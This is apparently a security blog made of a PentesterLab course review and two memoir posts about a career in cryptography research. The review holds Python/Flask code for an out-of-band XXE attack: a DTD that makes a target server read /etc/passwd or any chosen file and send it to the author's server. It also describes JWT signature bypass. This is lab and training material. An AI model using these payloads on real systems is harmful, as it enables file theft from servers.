A few examples of what you can expect to learn from PentesterLab:

  • An introduction to web security, through any of the Web for Pentesters courses, the Essential badge, the Introduction badge, or the bootcamp.
  • Advanced penetration testing that often leads to web shells and remote code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), Shellshock, out of band XXE, recent Struts 2 vulnerabilities (CVE-2017-5638), and more.
  • The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.
  • Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, Json Web Token, and Json Web Token II.
  • Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.
  • Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

  • Learning some functionality of Burp suite that I had not known existed. I thought I knew it well before I started, but it turns out that there were a number of little things that I did not know, often picked up by watching the videos (only available via pro membership).
  • Learning more about various types of encoding and how to do it in the language I choose (in my case, Python). The Python functionality I needed was not given to me from the site, but I was drawn to learn it as I was trying to solve various challenges. For example, I now know how the padding works in base64 (which is important because not all of the encodings I got from challenges were directly feedable into Python), and I learned about the very useful urllib.quote.
  • Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.

What you should know going in

What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is that you must not be afraid to try, and there may be times when you need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises such as Java Deserialization where you need to run somebody else’s software (in this case, ysoserial). Although it comes from very reputable security researchers, being ultra-paranoid, I prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only thing that I would suggest to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is FoxGlove Security, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through a YouTube video showing how to perform an attack, frustrated by the presentation? You know, those videos where the author stumbles through typing the attack description (never talking), with bad music in the background? Maybe you had to search a few times before finding a video that is reasonably okay. Well, not here — all the videos are very high quality. The author talks you through everything and has clearly put a lot of thought into explaining the steps to those who do not have the experience or background with the attack.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise, other times you have to think a bit. Many videos are spoilers — they show you how to solve the exercise completely (or almost completely), but it is usually best to try yourself before falling back to the videos: you won’t get more out of it than what you put into it.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

  • OSCP, which is infrastructure security as opposed to the web application security from PentesterLab. OSCP is the #1 certification in the industry, and is at a very reasonable price. It also has top quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it. I ran out of time (wife and kids were beginning to forget who I was) to work on it. And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all or nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality comparison, I’d say PentesterLab material is on par with OSCP.
  • Webgoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I want to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do that now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.
  • Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up.  If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.

In the course the author provides an awesome diagram of how it all works, which he explains in detail:

steps

(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker needs to set up his own server (“Attacker’s server” in the diagram) that serves a DTD. The attacker sends malicious XML to the vulnerable server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from the file system (step 4) and provide it to the attacker’s server (step 5).

So to start out, you need your own web server that the vulnerable application will fetch a DTD from. In this case, you are a bit on your own on what server you are going to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small Webrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has been a real pain for me historically, but I now have it working so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

from flask import Flask, request   # request is used by the smarter endpoint shown further below

app = Flask(__name__)

# Serve a static DTD that instructs the vulnerable server to read /etc/passwd
@app.route('/test.dtd')
def testdtd():
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way too slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: Make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

@app.route('/smart.dtd')
def dtdsmart():
    targetfile=request.args.get('targetfile')
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!

Overall, the course material gives a great description on what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

Json Web Tokens (JWT) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered with.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.

In practice, it’s not that simple. When I was attempting this, I was completely bothered by not knowing how to treat an RSA key as an HMAC key. I attempted in Python, fiddling around a few different ways for inserting the key to create the signature. None of them worked.

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…

light-bulb16-177x240

Exercise: ECDSA

According to stats on the site, the ECDSA exercise looks to be the most challenging. I decided to go after it because I was once a cryptographer and I was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this, particularly because ECDSA is in the capture the flag badge, so there is no guidance. You are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it uses an ECDSA private key to digitally sign a cookie containing your username. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab either to comment here or on reddit about their experience with the website.

Speak up people!

Why I left cryptography

This blog is a follow-up on my previous blog, How I became a cryptographer, which describes the very long, intense journey I took to get to the state where I could make a living publishing research in cryptography.  A few people have asked why I left, so here I give my reasons.  This blog may be useful to people who are uncertain whether they want to make a similar journey.

Feeling disconnected from the real world

The biggest reason why I left is that I felt cryptography research was more focused on the mathematics than it was on the real world applicability.  As much as I love the mathematics, algorithms, and puzzle solving, I wanted to work on research that mattered.  But the longer I stayed in cryptography, the more disconnected I felt from the real world.

Truthfully, the restrictions I put on myself limited me: I did not want to leave Sydney and I did not want to spend the majority of my time teaching.  Had I not kept those restrictions, I could have had more chances.  With them, the only job that I found to keep me going was to be a PostDoc research fellow.

As a PostDoc research fellow, you are typically paid by a government research grant that may last a couple of years.  When you are paid by such a grant, you need to deliver results that are in agreement with that grant so that, in the future, you have evidence that can be used to apply for similar grants to keep you going.  And so the cycle continues.

If you are really good and daring, you might stray from the research grant topic once in a while to see if you can make an impact somewhere else.  But your time for that is very limited.

I started on research grants involving number theory, then moved to research grants about cryptanalysis.  In this time, I got my top two research results, one of which influenced the field but unfortunately will never be used in the real world, the other of which had an important impact on what NIST declares acceptable today.  Also during that time, I did a lot of research that had hardly any relevance to the real world.

While being a PostDoc, I saw a lot of new crypto conferences popping up, and a lot of new crypto researchers publishing at new conferences.  Let’s just say that this was not due to an increase in quality in the field.  Instead, there were more opportunities to publish irrelevant research, which a researcher could use as evidence of making an ‘impact.’

I wanted to know what were the right problems to work on, but the longer I stayed in the field, the less vision I had on where to look.  I was stuck in the cycle, with no vision of what the real world needed.  I simply was not going to get that vision by continuing to do what I was doing.

Disillusionment

When designing a cipher, every cryptographer will tell you the first requirement.  Nobody will look at it unless it follows Kerckhoffs’ principle: the security of the cipher should depend upon the secret key and nothing else.  No secret algorithms.

With the AES selection competition between 1997 and 2000, several cryptographers tried to raise the bar.  Instead of just coming up with a design and relying on others to attack it, the designers should put some effort in themselves to show that it does not trivially fall to common attacks such as linear and differential cryptanalysis.  I worked with the RC6 design team (though I was not a designer myself), and we provided extensive analysis of the security of RC6.  We were proud of this.

However, a competitor algorithm went much further.  Not only did the designers attempt various cryptanalytic techniques against their own design, but they also proved (under reasonable assumptions) that the design was resistant to first order linear and differential cryptanalysis.  The proof was via the Wide Trail Strategy.  Their cipher, Rijndael, was the favourite amongst the majority of the cryptographers, and ultimately won the AES competition.  Even as a competitor to them, there is no doubt in my mind that the right cipher won.

This was great.  With the turn to the 21st century, we had a new standard of excellence.  Moving the bar beyond the 19th century Kerckhoffs’ principle, we now require designers to put substantial effort into analysing and proving the security of their design before presenting it to us.  Right?

That was my thought, but it is totally wrong.  For two reasons:

  • With the increase in the number of crypto conferences and crypto researchers, there was no possibility of enforcing a standard of excellence.  The doors were (and still are) wide open to publish a low quality design in a low quality conference.
  • Ultimately a fair number of designs get used in the real world long before going through a rigorous analysis and peer review process.

Sure, some designs start getting attention after they have been in use for a while, and by that time we either find problems in them or else fall back to “this algorithm has been in use for a long time and nobody has found problems with it, therefore we can trust it.”  And thus, the science is not maturing.

It is a lot easier to design something than it is to break something.  For every one man-hour used to design, it can take one or two orders of magnitude more man-hours to analyse, or maybe even more (depending upon the skills of the designer).  The cryptanalysts simply cannot keep up with the designers, so we instead declare that we will not look at their design for whatever reason.

I wish cryptography would get beyond Kerckhoffs’ principle.  I wish the effort between design and cryptanalysis was more balanced.  I wish we could give designers more practical advice on what it takes for their cipher to get attention.

I don’t believe that will ever happen.

A lot of labour for little reward

I started out with an attitude like Paul Erdős, but eventually materialism crept in.  It’s a lot easier to be idealistic when you are young and single than it is when you’re beginning to settle down and think about having a family.

As my software skills were dated, I felt very lucky that I could get out when I did.  Fortune brought me to a fantastic printer research company in Sydney that were mainly looking for smart people.  They offered me a good salary, and I was happy to leave cryptography behind.

I was able to maintain a decent salary, but it took me a good 7 years or so before I got to the point where I had strong enough skills in demand so that I could change employment without too much difficulty if I needed to.

Every now and then I get a call from a recruiter about a bank or other large company looking to hire a cryptographer.  They don’t need a researcher, but rather somebody who really knows cryptography and can advise on it.  I stopped pursuing these potential opportunities: they pay well, but my interests in security go way beyond cryptography, so I don’t want to pigeon-hole myself as a cryptographer only.

What I do today

Now I do more general security, which includes code review, penetration testing, and architecture/design.  I have strong skills in web security and embedded security.  I like having this breadth of expertise, but I also have a depth of expertise in cryptography, which distinguishes me from most people who do similar work.  The cryptography background is definitely a benefit.  But I am sure glad that I do a lot more than just that.


How I became a cryptographer

One of the questions that keeps on appearing over and over in Reddit’s /r/crypto is how to become a cryptographer.  For example this and this and this and this and this.

I often reply to these in comments. But given that the questions keep coming up, I thought it would be good to write up something more complete that I could reference back to. In doing so, I hope I can pass on some valuable tips that I learned the hard way on what it takes to “make it.”

When I say “make it”, I’m referring to being able to make a career as a cryptographer and nothing more. This blog assumes you understand what I mean by “cryptographer”: see Schneier’s article from 1999.  In short, I am showing the path I went down in order to be able to make a living publishing research papers on cryptography, which is not the same as being a practitioner using cryptography.

Often people replying to “how to become a cryptographer” say get a PhD in cryptography and publish lots of papers. That does not answer the question of “how do I qualify myself to get a PhD?” or “How do I learn to think like a researcher?” or “How do I do research?” Nor does it tell how to do significant research. I hope my blog provides some guidance on these questions.

I myself consider that I made it to the level of mediocrity as a cryptographic researcher. I certainly was no star. But I also started late in the game in terms of developing the way of thinking like a researcher. I believe most of the others had the tendency towards mathematical thinking from a young age. Because of that, I had a lot of catching up to do to compete with many from the field. If you’re reading this blog, then you might be like I was, and thus I hope it provides some helpful tips to you that I had to learn the hard way.

Here are what I believe are the 7 magic ingredients to becoming a cryptographer (in no particular order):

  • You need to be a brilliant mathematician (amended advice given here).

  • You need to be very strong in algorithms, including development and analysis.

  • You need to work your tail off.

  • You need to be creative in problem solving.

  • You need to be passionate about the field you are in.

  • You need to surround yourself with experts in the field.

  • You need a bit of luck (but luck happens when preparation meets opportunity!)

Now I tell my story.

My mischievous youth

I believe that those who have achieved a far-reaching life goal can look back at points from their early ages that contributed to where they are today, so this is where I start.

One trait I had that really contributed to my eventual career was my passion for creative puzzle solving. I personally was not so keen on listening to others (which is not good, by the way): instead I spent many hours trying to find solutions myself. In the early days, this manifested in examples like coming up with my own way to solve the Rubik’s cube, never reading the book.

I guess around 10 years old, I started using a computer and learning to program it. I spent many hours, not shy to sacrifice a whole weekend, making computer games. By the time I got my first 300 baud dial-up modem, I learned about bulletin board systems (BBSs), where nerds like me developed online social lives. For those who don’t know about BBSs, think of them as a stone-age Facebook.

It didn’t take long before thoughts of mischief on BBSs popped into my head. I spent many hours reading source code of the main BBS that Commodore 64 users were using and thinking about how I could do stuff that the system was not intended to do. I had particular interest in destructive actions solely for the purpose of childhood entertainment. My specialty was crashing (i.e. Denial of service) BBSs. Yes, I was extremely immature.

By age of 16, I was lucky to have access to a local free-to-use Unix system that I could dial into. It didn’t take long before I was exploring the cool /etc/passwd file. A friend of mine had discovered the algorithm that created the password hashes, and I spent many, many hours with no success in trying to invert that algorithm. This was my first exposure to modern cryptography, though at the time I did not know that I was trying to invert a hash function based upon the Data Encryption Standard (DES).

Being exposed to a Unix system and the C programming language 2 years before starting University gave me a head start. Knowing how to program and hack also made me a good candidate for becoming a cryptographer. But I was lacking what may be the most important ingredient: I was not a brilliant mathematician. Don’t get me wrong: I was decent at mathematics, but by no means brilliant. Maybe I was in the top 15% in my class. That’s nothing compared to most cryptographers who were surely the #1 in their school and beyond. For example, looking at the list of Putnam Fellows (top undergraduate mathematicians in the USA and beyond), one will see several cryptographers on the list.

University learning: changing the way I think

Because I was lucky enough to have my parents pay for my University education in America, I was free to commit a lot of time to learning. I wanted my parents to know that their money was not being wasted, so that drove me to work hard. Extremely hard work.

At the same time, I was going through some phase of not trusting anything. This was back in the Cold War days, when we were told that Russian people are evil and they all wanted to kill us and eat our brains. I was not that gullible, and the skepticism I had developed towards authoritative sources of information ended up being the essential ingredient in changing my way of thinking towards the direction of a researcher.

I did pretty well in my classes, though I often came up with reasons for not believing what they were teaching me, especially in physics. I looked to come up with an excuse for why it could be wrong. Can the science of physics be wrong? In order to prove something about reality, you need to make assumptions about reality, and that’s the part that I could always question. Footnote: I no longer take such extreme skepticism towards everything.

After dismissing physics, next came mathematics. How can I show it is wrong? This is an interesting question, because I, like many people, “learned” mathematics by “memorising the formula” and using it to solve problems. But if I am questioning everything, I can’t take that approach. Instead, I need to disprove the formula. This became a whole way of thinking for me.

When you go to University, you get lectures that you take notes from and a book to read. Which one am I supposed to learn from? I don’t know. I’ll try both.

In the end, I could not make any sense out of my notes, but I could learn from reading the book. The book gives you so much more information than can be packed into a one hour lecture, but the consequence is that you need to spend a lot more time learning. And if you want to disprove the book, you have to spend even more time!

So there I went: reading every single sentence and formula from the book, one-by-one, and trying to disprove it. And absolutely not going to the next one until I am 100% convinced that the sentence or formula is logically correct. To my surprise, I never came across a single thing I could disprove (other than perhaps small mistakes that were easy to correct). And this is what attracted me to mathematics, which ultimately provided me with the thought process I needed to become a cryptographer.

This I believe illustrates an important difference between how most people learn versus how people who end up becoming cryptographers/mathematicians learn. Most people trust the authoritative source. If you want to be a cryptographer, you cannot have that mindset. Instead, you need to question everything and confirm that everything you are being told is true.

Understand why. We cryptographers are constantly seeing new ciphers with miraculous security claims. If we did not question things the way we do, there would be a whole lot of snake oil used in the real world. When a mathematician reviews a proof, he looks for any way that it may be incorrect, and edge cases especially come into play. Similarly, if you can find any exception to a proof or claim of security for a cipher, that could be the key to breaking it. Sometimes finding a flaw in a security proof has huge implications even if the flaw does not translate into an immediate break of the construct.

I later learned that you need to go beyond that: you have to be able to prove the same thing you are reading, not just check that it is true. This of course is an even bigger time commitment, but you eventually learn to figure out the key points of the proof and then reconstruct the rest of it yourself.

When I did homework, I went to the library. Before I started, I would look around and carefully remember everybody I could see around me. After that I would start doing homework, giving it my full attention until it was all done. Then I would look around to see if anybody who had got there before me was still there: my rule was that nobody could study harder than me. If I found somebody, it meant that I needed to keep on studying. If there was no homework left to do, I would find a book on my current subject and learn a lot more than what the notes and the other students in the class covered.

For some classes, I really enjoyed this. For example, in discrete mathematics / combinatorics, I went to great lengths to find problems I could not solve. I had mastered the class textbook, which I loved, but I was also able to find some very old books in the library that were 100% dedicated to tricky combinatorial problems, and I worked through every one of them until I got to the point where I could solve just about anything thrown at me.

As you can see, I worked my tail off at the University and changed my way of thinking. I did not know it at the time, but this was actually my “catch up” time for getting my mind thinking the way the brilliant mathematicians who end up becoming cryptographers think.

I ended up with a double degree in mathematics and computer science. I did quite well, getting almost all A marks in mathematics and computer science, but not always the same success in other subjects. In my third year of University, I took a graduate-level class in cryptography, which I loved, and decided that this was what I wanted to do as a career. I just didn’t know how, but I did know that graduate school was probably the right direction forward.

Graduate school: learning to do research

My parents were generous enough to pay for my undergraduate education and expenses, but now that I was all grown up, it was time for me to pay my own way.

I tried very hard to get scholarships to help pay for my graduate school education. But at the end of the day, I was competing with students who already had patents, publications, and the like. I was also up against all-A students and students who had scored perfectly on the GRE. How could I possibly compete? The answer was that I needed to earn my way by being a teaching assistant (TA). Being a TA is a huge time commitment, which takes away from the learning that I really wanted to do, but it was the only way I could go forward.

I got accepted to some decent Universities, but top schools like MIT and Stanford were quick to turn me down. Of the ones that accepted me and offered me enough income from a TA position to pay my way, I decided to go to the University of Wisconsin-Milwaukee Computer Science Department, which had a few cryptography professors. I was considered the star student at the time, but in retrospect, this guy turned out to far outshine me.

I spent two years there taking classes and doing research. My research focus was number theory, particularly integer factorisation. Although I did well in mathematics as an undergraduate, it turns out that one really needs a much deeper mathematics background to do innovative research in factoring, so I mainly focused on implementation.

At that time, Arjen Lenstra at Bellcore was in his early days of what would be his long streak of smashing integer factoring records. I loved his research, but I also viewed him as my competitor: if I am going to “make it”, I need to beat him.

Just as in my undergraduate years, I was working my tail off. I was 100% committed to intellectual development. When I wasn’t doing TA duties, class work, or research, I was reading Usenet groups such as sci.crypt and sci.math and contributing to discussions. I also spent a lot of time breaking amateur ciphers that were posted on sci.crypt.

After 2 years, I was completing my Masters Degree and was exhausted from all the hard work. I decided that I needed to take a whole summer break just to gather myself. But fortune had another plan for me.

I received an email from Arjen Lenstra. This was not long after he had factored RSA-129, which got international press. Arjen was looking for a summer intern to work with at Bellcore.

There I was: exhausted, feeling as if I had spent 6 years fighting Mike Tyson, needing a rest, and then getting an email from my “competitor” asking if I wanted to work with him. What was I to do?

Thankfully, my parents and friends set my mind straight. I wanted to turn it down, but they said I would be absolutely crazy to do so, and they were right. I took the opportunity, which turned out to be the single most important decision in my career. Let me be 100% unambiguous: if I had declined this opportunity, I would never have made it as a researcher. Luck definitely played a role for me.

One of the most important things I learned from Arjen is that when I develop new algorithms, I need to prove that they are correct. This is obvious to a researcher, but it was not obvious to me. I had ways of solving problems that he wanted me to work on, but he said he wanted proofs before I went ahead and implemented them. And so I did.

In all honesty, I didn’t feel like I did great work for him during that internship, but I had enough background in what he wanted me to work on to succeed. As I said, I was exhausted from all the studying and TA duties, so I did not commit 100% like I had done during University study. I had also planned to take my time off to gather myself at the end of the 3-month internship.

To my surprise, as the internship came to an end, he asked what I was doing after it. I said “nothing.” He then asked why not stay working there until the end of the year. Hmmm, the pay is good, the experience is great, and what he wants me to work on is exactly what I want to work on. I’ll take it.

I spent approximately the next 5 months working on a project with Arjen that really excited me. We were using the MasPar massively parallel computer to implement fast linear algebra algorithms for solving the matrices that arise in factoring. We ended up writing a research paper on it, but it never got submitted anywhere. This was my fault: I was too busy to finish it off, and I thought it was research that nobody would be interested in. I was wrong.

During that time, I got back into the mindset of a researcher and I seem to have forgotten that I needed time to gather myself. I decided that having a Masters in Computer Science was not really what I needed: instead I needed an advanced degree in Mathematics. And I was 100% certain that I wanted to do that working for Carl Pomerance at the University of Georgia.

Carl was a well-known star in Number Theory. He, along with Andrew Granville and Red Alford, had just completed a proof that there are infinitely many Carmichael numbers, which excited me. Carl was also well known for factoring. I didn’t realise it at the time, but one of the reasons why everybody knew Carl is because he wrote his research so well that even an idiot like me could understand it. Not many mathematicians have that skill.

I thought I would be able to comfortably get into the University of Georgia, but I was wrong. On paper, I was borderline for their Masters program, and getting a TA job in particular was going to be tough.

Completely out of character for me, I decided to make a 10 hour drive to Georgia to meet with Carl and other people at the University, and convince them that they should accept me as a graduate student. I wonder to this day if they ever had anybody else approach them like that. I went there, talked to a number of Professors, told them about who I am and what I wanted to do. If nothing else, they saw the passion for mathematics and research in my eyes, and combining that with a letter of recommendation from Arjen, they decided to give me a shot. I got accepted and was offered a TA position.

Truthfully, I don’t know if they really believed that I would make it, and rightfully so. I did not know about the level of competition I was going to find at this University, but as before, I was able to make up the difference by extremely hard work. This was also the time that I learned that checking the proofs is not enough: you need to be able to prove everything in the book yourself.

I surprised a lot of people and eventually they accepted me as a PhD student. Carl Pomerance and others really believed in me. But eventually, 8 years of intense University studying had clobbered me. I was beat and financially in debt, and I really needed a break. Carl tried hard to convince me to go through with the PhD, but I just couldn’t find the drive any longer. I bailed out with a Masters degree.

At this point I had a double Bachelors degree in Mathematics and Computer Science, a Masters degree in Computer Science, a Masters degree in Mathematics, and letters of recommendation from big shots Arjen Lenstra (pretty much the top computational number theorist ever) and Carl Pomerance (big shot analytical number theorist). Suddenly, how I looked on paper was representative of how good I considered myself to be. And with that, I got a position in industry as a research associate that I believe I deserved, working for RSA Labs at RSA Data Security.

The only catch was that, even though I did research to get my Masters degrees, my research was not particularly innovative. So I couldn’t call myself a researcher yet.

Getting my first publications

It took me a bit of luck to upgrade my skills and get myself where I needed to be in University and graduate school, but at this point I believe that I truly was the best person for the position I took at RSA Labs. Having said that, what an amazing opportunity it was to see minds like Ron Rivest and Yiqun Lisa Yin in action.

It happened to be a convenient time to work there, as there was a call for an Advanced Encryption Standard and RSA Labs had one of the top candidates: RC6.

Ultimately, I made no contribution to the final design of RC6, but I was able to contribute to the analysis. My tendency to disbelieve anything that lacked a proof was instrumental in my attempts to check the heuristic analyses that the team did to understand the security. It turned out that the heuristic analyses didn’t hold for some simplified variants of RC6, which resulted in my first publication, with Ronald Rivest, Matt Robshaw, and Yiqun Lisa Yin as coauthors.

It was not that difficult to get this result. I wrote a program to try to verify the heuristic claims. I saw that those claims were not always correct. I spent time understanding why the claims did not hold via debugging and analysis, and worked with my colleagues to develop the analysis further. Then came formal proofs, the write-up, and publication.

I did a fair amount of work with Yiqun Lisa Yin, who helped me get a few other publications coauthored with her. She is a brilliant mind and knew where the research community was going. She had the great ideas and I helped where I could.

Despite my success in getting publications, I felt: (1) the results were not significant enough to make me feel as if I had “made it” as a researcher, and (2) except in the one publication above, the main ideas were largely coming from other people rather than myself.

Getting significant research results

The position at RSA Labs lasted about 2 years, at which time the company that bought RSA decided that research in cryptography was not so important and cut off the West Coast research arm.

For a number of years after that, I went back and forth between academia and industry, seeking another position like the one I had at RSA Labs. I wanted to do research but also develop software. It turned out that such positions are extremely rare.

I held a couple of positions that are normally for postdoctoral researchers, despite not having a Doctorate. One of those was at Macquarie University, with the aim of doing research in Number Theory.

Unfortunately, I did not have a strong enough background to do significant research in Number Theory, or at least I didn’t think so. I did get a few crypto publications during this time, but I felt they were fairly small results. Towards the end of the appointment, I was ready to give up.

(Side note: I actually did my PhD while at the same time holding this PostDoc position).

It was my office-mate, Ron Steinfeld, who suggested that we look at hash functions. He had some ideas that I was happy to work on with him.

Somehow, I got distracted and started thinking about a hash function built by multiplying small primes together. I wrote a simple equation on the whiteboard and looked at it. I then noticed that if there is a collision, something remarkable happens.

I turned away and thought, “no I need to get back to number theory research.” Gratefully, the little man in my head shook my brain and screamed: “What’s the matter with you, idiot! There’s something interesting here!” So I went back to the equation, thought about it more, and then convinced myself that there is opportunity here. I showed it to Ron, and he said this looks like a breakthrough.

Ron helped me formalise it and justify its significance, and we wrote it up in pretty good detail. Igor Shparlinski helped us in an essential analysis part, but he said he didn’t think his contributions were significant enough to coauthor. We then showed it to Arjen, who had an idea to make it faster and helped the overall writeup.

Finally, I had my breakthrough. The VSH hash function was published at Eurocrypt. The paper came just after Wang et al. broke all the practical hash functions. I had solved the right problem, in the right way, at the right time. Or at least so I had thought.

Another significant area I worked on was HMAC. Given that the underlying hash functions were broken, what were the implications for HMAC? Yiqun led this. My main contribution was coming up with practical algorithms to attack HMAC and NMAC given hash collisions, which was significant to the paper. So this was my second significant research result.

Finally, I felt like I had made it as a cryptography researcher. Finally I started having confidence that I could make a career doing this. Ironically, I decided not to.

Additional tips for those aiming to become cryptographers

I would like to think I have learned a thing or two about research in all these years of effort. So here is the advice I pass on to those who are just making the journey.

The number one piece of advice is to read Richard Hamming’s advice on how to do great research. I first discovered this while doing my “PostDoc” research at Macquarie University. I must have read it at least 10 times since. You need to know where the field is going in order to make significant contributions. If you don’t work on the right problems, you’re not going to have an impact. Surrounding yourself with experts in the field will help guide you in making an impact. Don’t be afraid of going after the big problems.

Another point from Hamming is selling your research. He is so right. When I first got publications, I considered the writeup the boring part: I had solved a problem, now I need to waste all this time writing it up rather than go out and solve more problems? Absolutely the wrong attitude. Think about the people you look up to as researchers. You might have names like Dan Boneh, Adi Shamir, etc…. If your list is anything like mine, you may notice that they are great communicators. They write well and they present their research well. If you can clearly explain and motivate the problem you are trying to solve, it will not only attract others to your research, but it will also help you better understand the value of your research and the interesting directions you can go.

Doing research is frustrating. One of the things that threw me off is that although I was very good at a lot of things, I just did not have the mathematical depth of many people in the field. How could I compete with them?

It wasn’t until VSH that it dawned upon me that you don’t have to be the greatest mathematical mind to make an impact. Think of great impacts like RSA: it was just a coincidence that it was invented by some of the best cryptographers ever; mathematically it really is very simple. Another example is Shamir Secret Sharing: such a simple concept with great impact, and it is only a coincidence that it was invented by the greatest cryptographer ever! My point is: don’t be intimidated like I was just because other people know more. Often simple ideas have the biggest impact. Try a lot of ideas, and be creative and persistent.

It really helps a lot to master some mathematical tools. For me, smoothness was what helped, and it had only been used minimally for constructive purposes in cryptography before.

Many times I thought to myself “I really need to master lattices”, but then later dismissed it: “I’m too late: all the low hanging fruit is gone.” I was so wrong: it was never too late!

Why I left cryptography

If there is interest, in a future blog I will write about why I left cryptography.

Top 10 Developer Crypto Mistakes

